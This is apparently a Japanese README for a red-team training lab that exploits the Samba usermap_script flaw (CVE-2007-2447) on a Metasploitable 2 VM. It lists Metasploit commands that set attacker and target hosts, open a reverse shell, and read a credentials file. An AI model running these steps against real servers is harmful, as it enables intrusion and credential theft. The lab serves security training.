
Metasploitable 2上のSamba CVE-2007-2447をMetasploitを使用して悪用するステップバイステップのペネトレーションテストラボ。ルート侵害、資格情報窃取、データ流出を実証し、教育用のレッドチームトレーニングを提供します。
RedTeam-SMB-PenTest |
|
msfconsole
攻撃ホストとターゲットマシンの両方が起動して実行されていることを確認してください。

search samba
use exploit/multi/samba/usermap_script
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse
exploit
whoami
hostname
cd /redteam7/student3
cat mypass.txt
# Leave current shell
Ctrl C
exit
# Kill all background jobs
sessions -K
jobs -K
# Restart Metasploit
msfconsole
### 重要なポイント
usermap_script を使用する Samba 3.0.20 のようなレガシーサービスは非常に脆弱です。| 構成要素 | 詳細 |
|---|
| 攻撃VM | Kali Linux |
| ターゲットVM | Metasploitable 2 |
| 対象ポート | 445 (Samba/SMB) |
| 使用エクスプロイト | exploit/multi/samba/usermap_script |
| 資格情報のターゲット | /redteam7/student3/mypass.txt |